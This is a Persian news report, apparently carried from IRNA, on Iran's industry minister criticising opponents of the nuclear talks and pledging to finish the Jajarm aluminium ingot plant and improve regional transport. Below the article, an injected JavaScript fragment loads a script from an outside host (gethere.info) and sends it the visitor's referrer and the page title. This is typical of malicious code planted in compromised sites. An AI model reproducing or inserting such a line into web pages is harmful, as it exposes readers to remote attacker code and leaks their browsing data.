پنج شنبه , 23 آذر 1396
خانه / اخبار اقتصادی / اقتصاد ایران / شگفت آور است که برخی با مذاکرات هسته ای مخالفند

شگفت آور است که برخی با مذاکرات هسته ای مخالفند

بجنورد – ایرنا – وزیر صنعت، معدن و تجارت گفت: اینکه برخی با مذاکرات هسته ای مخالفت می کنند شگفت آور است.

به گزارش ایرنا محمدرضا نعمت زاده که عصر یکشنبه به نمایندگی از رییس جمهوری در نشست شورای اداری شهرستان جاجرم شرکت کرده بود، اظهار کرد: این عده حتی با سرپیچی از دستور رهبر معظم انقلاب، به تیم چیره دست مذاکره کننده کشور توهین می کنند.

وی با بیان اینکه یکی از علل عقب ماندگی صنایع و تکنولوژی کشور، به محدودیت ها و فشارهای ناشی از تحریم ها برمی گردد، افزود: البته خوشبختانه توانسته ایم با درایت تیم هسته ای و بخصوص دکتر ظریف، تحریم ها را در بخش صنعت و بانک ها بی اثر کنیم.

نعمت زاده با اشاره به این که دولت تدبیر و امید فعالیت خود را بر سه محور اساسی متمرکز کرده، گفت: ساماندهی اقتصاد کشور، تعامل با جهانیان و رساندن روابط بین الملل به شرایط عادی و تقویت اخلاق در جامعه از محورهای کار دولت یازدهم است.

وی در خصوص کارخانه شمش آلومینای جاجرم نیز افزود: به رغم محدودیت های بودجه ای که وجود دارد، قول می دهیم که این واحد صنعتی را تکمیل و تولید شمش را در این واحد به 100 هزار تن افزایش دهیم.

وی گفت: همچنین تمامی معادن بوکسیت شهرهای بزرگ کشور از قبیل یزد و کرمان در اختیار شمش آلومینای جاجرم قرار خواهد گرفت.

وی علت عقب افتادگی ساخت کارخانه شمش آلومینای جاجرم را وجود تحریم ها دانست و تاکید کرد: این واحد صنعتی در استان خراسان شمالی تا یک سال دیگر راه اندازی می شود.

وزیر صنعت، معدن و تجارت در خصوص واگذاری فرودگاه مجتمع آلومینای جاجرم به سازمان هاپیمایی نیز گفت که این وزارتخانه در این خصوص مشکلی ندارد.

نعمت زاده به اهمیت جاده میامی – جاجرم در توسعه کارخانه های صنعتی این استان اشاره کرد و گفت: توجه به این جاده تاثیر مستقیم در ترانزیت محصولات کارخانه آلومینای جاجرم، پتروشمی بجنورد و فولاد اسفراین دارد.

علی اکبر محبی فرماندار جاجرم نیز خواستار تکمیل واحد شمش آلومینای جاجرم، تخصیص اعتبار برای جاده میامی – جاجرم، جاده سنخواست – شوقان – بجنورد، تعریف فرودگاه جاجرم به عنوان فرودگاه دوم استان، تاسیس ایستگاه راه آهن آلومینا و راه اندازی قطار محلی جاجرم – مشهد – تهران شد.

وزیر صنعت، معدن و تجارت در حاشیه شورای اداری جاجرم از واحد صنعتی در حال ساخت شمش آلومینای جاجرم بازدید کرد.

کارخانه شمش آلومینیوم مجتمع آلومینای جاجرم ظرفیت تولید سالانه ۱۱۰ هزار تن شمش آلومینیوم را دارد که با بهره برداری از مرحله نخست آن امکان تولید ۳۶ هزار تن شمش آلومینیوم فراهم می شود.

کارخانه آلومینای جاجرم در فاصله 175 کیلومتری جنوب غربی بجنورد، مرکز خراسان شمالی قرار دارد که در سال ۸۱ و در دوران دولت اصلاحات با ظرفیت تولید ۱۰۰ هزار تن پودر آلومینا در سال به بهره برداری رسیده است.

شهرستان 36 هزار نفری جاجرم در 170 کیلومتری جنوب غربی بجنورد قرار دارد.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

بازتاب کلوب